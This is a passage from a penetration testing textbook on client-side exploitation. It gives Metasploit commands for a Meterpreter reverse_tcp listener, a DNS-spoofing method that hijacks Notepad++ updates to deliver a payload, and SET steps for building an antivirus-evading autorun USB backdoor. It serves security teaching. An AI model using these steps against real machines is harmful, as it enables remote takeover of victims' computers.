Ethical Hacking and Penetration Testing Guide
Step 5—Setting up a Listener on Metasploit
Yüklə 22,44 Mb. Pdf görüntüsü
|
- Bu səhifədəki naviqasiya:
- Step 5—Setting up a Listener on Metasploit
- Attack Scenario 4: Malware Loaded on USB Sticks
|
Step 5—Setting up a Listener on Metasploit
Next, we will set up a listener on Metasploit where we would receive the connections. We enter the following command to do it: msf> use exploit/multi/handler msf> set payload windows/Meterpreter/reverse_tcp msf> set LHOST 192.168.75.144 msf> set LPORT 4444 These commands would set up a listener on port 4444. When our agent is executed on the victim’s machine, it would send a reverse connection to our local IP address on port 4444. Client Side Exploitation ◾ 227 Step 6 — Performing DNS Spoofing Attacks We have discussed how to launch DNS spoofing attacks in detail; therefore, I will walk you through the process briefly here. In order to perform a DNS spoofing attack, we need to change the place where Notepad installs updates to our local host. To do that, we have to edit the etter. dns file. You can do it by using the following command: root@bt: pico/usr/local/share/ettercap/etter.dns We now need to create a new “A” record, for notepad-plus.sourceforge.net, from where the Notepad++ would receive updates to our local IP. Note : We came to know that Notepad++ receives updates from notepad-plus.sourceforge.net by entering the “show options” command in the module. Next, launch the DNS spoofing attack with Ettercap or any other tool. If you are unsure of how to do it, refer to the “Network Sniffing” chapter (Chapter 6). Step 7 —So now we are ready to attack. As soon as the victim opens his Notepad++, he will be asked to update the application. As soon as the victim clicks “Yes,” our payload will be executed and we will enter a Meterpreter session. Attack Scenario 4: Malware Loaded on USB Sticks As discussed earlier, this type of attack is useful only when you have physical access to the victim’s computer, whereby we can load up our malicious payload upon inserting the USB stick to the computer, which will give us a reverse connection. Note that this attack would work only if auto- run is enabled on the victim’s computer. So let’s begin. 228 ◾ Ethical Hacking and Penetration Testing Guide Step 1 —From the SET’s main menu, select the third option “Infectious Media Generator.” Step 2 —From there, select the second option “Standard Metasploit Executable,” which will enable you to generate an executable with an autorun.inf file. Step 3 —It will now ask for our reverse IP that is going to be our LHOST. Enter your LHOST and press “Enter.” Step 4 —Next, it will ask for the type of the payload we want to use; we will use our favorite Meterpreter reverse TCP payload. Step 5 —Next, it will ask for the type of encoding we want to use to bypass any antivirus restric- tions. Choose any one you like; the SET author recommends “Backdoor Executable.” Client Side Exploitation ◾ 229 Step 6 —Finally, it will ask for the port on which to listen for connections; enter any random port that is not in use. We are now done with creating our executable. All you need to do is to burn it to a USB and load it on the victim’s machine. Once done, it will automatically execute if autorun.inf is enabled, and you will get a reverse connection. Yüklə 22,44 Mb. Dostları ilə paylaş:
|